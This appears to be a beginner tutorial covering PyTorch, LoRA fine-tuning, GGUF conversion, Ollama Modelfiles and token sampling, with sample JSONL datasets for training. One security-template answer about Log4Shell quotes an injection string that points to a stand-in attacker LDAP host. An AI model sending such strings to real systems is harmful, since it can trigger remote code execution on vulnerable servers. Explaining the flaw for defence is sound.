Tutorial · ages 12 +

How does an AI actually learn things?

A step-by-step tour of PyTorch, neural networks, training, the secret format Ollama uses, and how your typed question actually turns into an answer. No PhD required — middle-school math is enough.

12
chapters
~30 min
to read
7
diagrams
3
dataset templates
Chapter 01

What is PyTorch?

Imagine a really, really fast calculator. Not just one that adds two numbers — one that can multiply millions of numbers at once, AND remember every step it took. That's PyTorch. It's a free software library that runs on your computer and powers most of the AI you hear about.

PyTorch has two superpowers:

  1. Tensors. A tensor is just a grid of numbers — like a spreadsheet, but it can have more dimensions. A list is a 1-D tensor, a table is a 2-D tensor, a stack of tables is 3-D, and so on. AI models are made of millions of numbers organized into tensors.
  2. Autograd. The "remembering" part. When you do math on tensors, PyTorch secretly writes down every step. Later it can run those steps backwards to figure out how to improve — which is how AIs learn.

You don't have to write PyTorch code to use this project. The trainer container does all of that. But knowing what's happening inside helps everything else make sense.

Official PyTorch tutorial ↗
Chapter 02

How does a model actually "think"?

A neural network is built from tiny math units called neurons. A single neuron does something a 5th grader could do:

  1. Take some numbers as input (say, three numbers).
  2. Multiply each by a "weight" — a knob that the model gets to tune.
  3. Add them all up. Add one more number called a "bias."
  4. Run the result through a simple decision function (like: "if it's negative, make it zero").
  5. Spit out the result.

That's it. One neuron is dumb. But when you stack thousands of them in layers, and the output of one layer becomes the input of the next, magical things happen — the network learns to recognize cats in photos, translate French, or answer grocery questions.

Every "weight" is a number PyTorch stores in a tensor. The famous "135 million parameter model" we use? That's 135 million weights, sitting in tensors, ready to be tuned.

A single neuron x₁ input 1 x₂ input 2 x₃ input 3 w₁ w₂ w₃ Σ add them up activation ReLU, sigmoid… y output y = activation(w₁·x₁ + w₂·x₂ + w₃·x₃ + b)
Chapter 03

The math, made simple.

Three things to know. That's it.

MATH IDEA #1

Multiply & add

Every layer of a model is mostly just multiplication-and-adding. Lots of it.

inputs:  [1, 2, 3]
weights: [4, 5, 6]
output = 1×4 + 2×5 + 3×6
       = 4 + 10 + 18
       = 32

This is called a "dot product." A neural network does millions of these per second.

MATH IDEA #2

Activation: yes/no/maybe

After the sum, the result goes through an "activation function" that decides if the neuron speaks up.

x y y = max(0, x)

This one is called ReLU. If x is negative, output 0. If positive, pass it through. Simple, but it's the workhorse of modern AI.

MATH IDEA #3

Roll downhill

Training is just: which way should I tweak the knobs to make the answer better?

"loss" goes down with each step

PyTorch's autograd computes the slope automatically. The optimizer takes one small step downhill. Repeat thousands of times → the model learns.

Chapter 04

Words → numbers: meet the tokenizer.

Models can't read English. They can only do math. So before any text reaches the model, a piece of code called the tokenizer chops it into pieces and replaces each piece with a number.

The pieces aren't always whole words. Common words get one number; rare words get split. "unbelievable" might split into "un" + "believ" + "able" — three tokens. Each token has an ID from a fixed "vocabulary" (usually around 32,000 – 200,000 entries).

This is also why we say things like "this model has a 2,048 token context" — that's how many tokens it can pay attention to at once.

"How do I store herbs?" your message tokenizer BPE tokens How do I store herbs ? token IDs (numbers) 2437 466 358 3637 28435 30 → into the model A peek at the vocabulary: 2437 → "How" 466 → " do" 358 → " I" 3637 → " store" 28435 → " herbs" (token IDs shown are illustrative)
Chapter 05

The training loop: how it actually learns.

Four steps, repeated thousands of times. That's all training is.

training loop repeat ×N 1. Forward predict an answer 2. Loss how wrong were we? 3. Backward which knobs caused it? 4. Update tweak the weights

1. Forward

Show the model one training example and let it guess. For us: "How do I pick a ripe avocado?" The model produces some sequence of tokens.

2. Loss

Compare its guess to the correct answer in our dataset. The loss is a single number — bigger if the guess was bad, smaller if it was close.

3. Backward

PyTorch's autograd walks backwards through every step, computing how much each weight contributed to the error. This is the "gradient."

4. Update

The optimizer (we use Adam) nudges each weight a tiny bit in the direction that reduces the loss. Just a little — too big a nudge and we overshoot.

Chapter 06

LoRA — teaching old models new tricks, cheaply.

Here's a problem: our model has 135 million weights. Training all of them takes a lot of memory and time. And we only have 65 examples — not nearly enough to retrain the whole thing without breaking what it already knows.

LoRA (Low-Rank Adaptation) is the trick. Instead of changing the millions of original weights, we:

  1. Freeze the entire base model. Nothing changes.
  2. Add a small "side patch" — two tiny matrices that get multiplied together — alongside certain parts of the model.
  3. Train only those tiny matrices. Maybe 700,000 numbers instead of 135 million.
  4. When we're done, mathematically merge the side patch back into the original weights. The result is a single normal model that's been gently steered toward our task.

It's like teaching a Michelin-starred chef one new dish — you don't send them back to culinary school. You just show them the recipe.

Original LoRA paper ↗
BASE MODEL · 135M weights ❄ FROZEN + LoRA adapter ~700K trainable weights (0.5%) → merge into base → final model
Chapter 07

From PyTorch to Ollama: the GGUF format.

After training, PyTorch saves the model as a bunch of files: weights in .safetensors, settings in config.json, the tokenizer in another folder. That's fine for Python, but Ollama wants something simpler — one file with everything in it.

That format is called GGUF (it stands for "GGML Universal Format" — a bit of an acronym sandwich). Think of it like zipping a complicated folder of files into a single ZIP. Plus, GGUF stores the numbers in a clever way that makes the model fast to load and small to store, especially on regular computers without expensive GPUs.

We use a tool called llama.cpp (a famous open-source project) to do the conversion. One Python command, one file out.

BEFORE — PyTorch format
output/merged/
├── config.json
├── model.safetensors  (260 MB)
├── tokenizer.json
├── tokenizer_config.json
└── special_tokens_map.json

5 files · ~270 MB total
AFTER — GGUF
output/
└── grocery-slm.gguf   (270 MB)

1 file · everything inside

Tokenizer, weights, settings — all baked in.

The Modelfile — Ollama's recipe card

A GGUF on its own is just weights. To tell Ollama how to use the model, we add a Modelfile. It's a tiny text file with simple instructions.

# Where to find the weights
FROM ./grocery-slm.gguf

# How to format messages before the model sees them
TEMPLATE """{{ if .System }}<|im_start|>system
{{ .System }}<|im_end|>
{{ end }}<|im_start|>user
{{ .Prompt }}<|im_end|>
<|im_start|>assistant
"""

# Generation knobs
PARAMETER temperature 0.6
PARAMETER top_p 0.9

# The personality (system prompt)
SYSTEM """You are GroceryGPT..."""
FROM

Points to the GGUF file with the weights. The starting line.

TEMPLATE

The exact text format the model expects. Different model families use different special tokens.

PARAMETER

Generation knobs — temperature (creativity), top_p (variety), num_ctx (context window).

SYSTEM

A hidden message sent before every conversation. Sets the personality.

Full Modelfile reference ↗
Chapter 08

End to end: what happens when you click "send"?

browser nginx (proxy) ollama model ① POST /api/chat { "messages": [...] } ② forwarded as-is ③ tokenize → run → generate attention layers · softmax · sample ④ one token at a time ⑤ NDJSON chunks ⑥ painted as they arrive

The key word here is streaming. The model writes its answer one token at a time. We don't wait for the whole thing — each token gets sent back to your screen immediately. That's why answers feel like they're being typed.

Chapter 09

How does the model pick the next word?

Softmax, in three minutes.

After all the math, the model spits out a list of raw scores — one for every possible next token (around 49,000 of them). These are called logits. They're not probabilities yet — just preferences.

To turn them into probabilities, we use a function called softmax. It does two things:

  1. Pushes bigger scores way up and smaller scores way down (exponentially).
  2. Scales everything so it adds up to 1.0 — like a percentage.

Then we don't always pick the highest one. That would be boring and repetitive. Instead we sample: roll dice weighted by the probabilities. The "temperature" parameter controls how spiky vs flat those probabilities are. Low temperature = always pick the favorite. High temperature = more variety, more risk of nonsense.

After "How do I store" the model sees: LOGITS (raw scores) herbs8.2 food7.5 meat5.1 bikes1.0 softmax PROBABILITIES (sum = 1.0) herbs0.65 food0.32 meat0.03 bikes~0 sample (roll weighted dice) → this time it picks "herbs" temperature controls how spiky/flat the dice are ↻ now the input is "How do I store herbs", repeat until the model outputs the special "end" token
Chapter 10

Teach it something new — your own dataset.

The whole system is dataset-shaped. Swap out data/dataset.jsonl, retrain, and you've got a completely different specialist. Here are three real templates to start from.

The format, always

One example per line. Each line is a JSON object with a messages array. Two roles: user (the question) and assistant (the perfect answer you wish the model would give).

{"messages": [
  {"role": "user",      "content": "..."},
  {"role": "assistant", "content": "..."}
]}

Aim for 50+ diverse examples to start. More is better, but quality > quantity. Real, varied, accurate examples beat 1,000 copy-pasted near-duplicates every time.

A

Template A — Code snippets

For making a coding assistant. Each example is a programming question and a clean, runnable solution.

{"messages":[{"role":"user","content":"How do I read a file line by line in Python?"},{"role":"assistant","content":"Use a context manager — it auto-closes the file:\n\n```python\nwith open('file.txt') as f:\n    for line in f:\n        print(line.rstrip())\n```\n\nThis streams one line at a time, so it works on huge files."}]}
{"messages":[{"role":"user","content":"Reverse a string in JavaScript."},{"role":"assistant","content":"```javascript\nconst reversed = str.split('').reverse().join('');\n```\n\nSplit into characters, reverse the array, join back. Note: this breaks on emoji and some Unicode — use Array.from(str) for those."}]}
{"messages":[{"role":"user","content":"What's the difference between let and const in JS?"},{"role":"assistant","content":"`const` means you can't reassign the variable. `let` means you can. Both are block-scoped (unlike var). Default to const; use let only when you genuinely need to reassign."}]}
Where to find data

Your own commits, Stack Overflow Q&A, public docs of libraries you love. Pair each question with a tested answer.

Pitfalls

Escape newlines properly (\n) — invalid JSON will silently skip lines. Use the same code-fence style (```python) everywhere.

Bonus tip

Include a couple "explain this" examples too — not just code generation. Helps the model talk about code, not just write it.

B

Template B — Security & network knowledge

For a security/networking helper. Ports, protocols, CVEs, common attacks, headers — concise, accurate, citable.

{"messages":[{"role":"user","content":"What's the default port for SSH?"},{"role":"assistant","content":"SSH uses TCP port 22 by default, assigned by IANA. Many admins move it to a non-standard port to reduce noisy scans — that's security through obscurity, not real protection. Real protection comes from key-based auth and disabling password login."}]}
{"messages":[{"role":"user","content":"What is CVE-2021-44228?"},{"role":"assistant","content":"Log4Shell — a critical remote code execution flaw in Apache Log4j 2 (versions < 2.17.0). Attackers can trigger it by getting a vulnerable app to log a crafted string like ${jndi:ldap://attacker.com/x}. CVSS score: 10.0. Fix: upgrade Log4j; if you can't, set log4j2.formatMsgNoLookups=true."}]}
{"messages":[{"role":"user","content":"Explain the X-Frame-Options HTTP header."},{"role":"assistant","content":"X-Frame-Options tells browsers whether your page can be embedded in an <iframe> on other sites. Values: DENY (never), SAMEORIGIN (only your own site), or ALLOW-FROM uri (deprecated). It prevents clickjacking. Modern alternative: Content-Security-Policy frame-ancestors directive, which is more flexible."}]}
{"messages":[{"role":"user","content":"What does a SYN flood attack do?"},{"role":"assistant","content":"It exploits the TCP 3-way handshake. The attacker sends many SYN packets but never replies to the SYN-ACK. The target's connection table fills with half-open connections, eventually refusing legitimate traffic. Mitigations: SYN cookies (defer state allocation until ACK arrives), connection rate limits, and proper firewall rules."}]}
Where to find data

NIST NVD (CVE database), MITRE ATT&CK, RFC documents, OWASP cheat sheets. All free and authoritative.

Pitfalls

Accuracy matters more here than anywhere — wrong CVE details could mislead someone in a real incident. Verify every answer.

Bonus tip

Add a system-prompt rule: "If you're not sure, say so." Small models will confidently invent CVEs otherwise.

C

Template C — Log file interpretation

For a log-whisperer. Paste an obscure log line, get a plain-English explanation and likely causes.

{"messages":[{"role":"user","content":"What does this mean?\n2024-03-15 14:22:01 ERROR [pool-1-thread-3] com.app.UserService - Failed to authenticate user: java.sql.SQLException: Connection timeout after 30000ms"},{"role":"assistant","content":"A Java app (UserService) tried to look up a user in a database to authenticate them, but the database query timed out after 30 seconds. Most likely causes:\n\n1. The database is down or unreachable.\n2. Connection pool exhausted — all connections in use.\n3. A slow query is holding locks.\n4. Network issue between app and DB.\n\nCheck DB status first, then connection pool metrics, then query logs."}]}
{"messages":[{"role":"user","content":"Nginx log: 192.168.1.5 - - [12/Mar/2024:10:14:33 +0000] \"GET /api/users HTTP/1.1\" 404 312 \"-\" \"curl/7.81.0\""},{"role":"assistant","content":"An Nginx access log entry. Breaking it down:\n• 192.168.1.5 — client IP\n• 12/Mar/2024:10:14:33 — timestamp\n• GET /api/users — request method + path\n• 404 — status code: resource not found\n• 312 — bytes sent in response body\n• curl/7.81.0 — User-Agent (someone using curl, not a browser)\n\nThe 404 means /api/users doesn't exist on this server. Check your route config or if the request should go to a different upstream."}]}
{"messages":[{"role":"user","content":"systemd: 'sshd.service: Main process exited, code=killed, status=9/KILL'"},{"role":"assistant","content":"The SSH daemon (sshd) was killed by signal 9 (SIGKILL). Signal 9 is uncatchable — something forcibly terminated it. Common causes:\n\n1. The OOM killer ran out of memory and killed sshd.\n2. Someone ran `kill -9` manually.\n3. A misbehaving init script.\n\nCheck `dmesg | grep -i oom` for memory pressure, and `journalctl _COMM=systemd` around the timestamp for context."}]}
Where to find data

Your own logs (redact PII!) — nginx, syslog, application logs. Public dataset: LogHub has labeled samples.

Pitfalls

Strip secrets, IPs, usernames, real CVE IDs from your own logs before training. Models can leak training data verbatim.

Bonus tip

Cover multiple log formats — nginx, systemd, JSON-structured logs, stack traces. Each looks different.

The 5-step workflow for your own dataset

  1. 01Write 50–100 example Q&A pairs in JSONL using one of the templates above.
  2. 02Save as data/dataset.jsonl (overwrite the grocery one).
  3. 03Optionally rewrite the SYSTEM line in Modelfile to match the new persona.
  4. 04Run docker compose --profile train run --rm trainer — takes 5–15 min on CPU.
  5. 05docker compose restart ollama-init and try your new model.
Chapter 11

The toolkit — every piece, what it does.

The Stack CPU (your laptop) PyTorch Transformers (Hugging Face) PEFT (LoRA) llama.cpp (GGUF conversion) Ollama (the server) Nginx (proxy + static files) Your browser → the chat UI

PyTorch

pytorch.org ↗

The math engine. Defines the tensors, runs the forward + backward pass, and lets PEFT bolt LoRA onto the model.

Hugging Face Transformers

docs ↗

A library that wraps PyTorch with model-specific knowledge. Knows the architecture of SmolLM2 (and dozens of others), how to tokenize for it, and how to load weights from the Hugging Face Hub.

PEFT

docs ↗

"Parameter Efficient Fine-Tuning." Implements LoRA. About 50 lines of config and PyTorch knows to freeze the base and add tiny trainable adapters.

llama.cpp

github ↗

The legendary open-source project that started CPU inference of LLMs. We use its Python converter to turn PyTorch weights into a single GGUF file.

The "Docker for LLMs." Loads GGUF files, manages models, and serves a simple HTTP API for chat. Auto-detects whether to use GPU or CPU.

Docker + Compose

docs ↗

Packages every service (trainer, ollama, init, web UI) into containers so it runs the same on any computer. docker compose up brings the whole stack online.

A web server. We use it for two things: serving the HTML chat page and proxying API requests to Ollama (avoids CORS pain).

Chapter 12

Keep learning.

The best free resources to go further. All of these are written by the people who built the things.

Deeper dive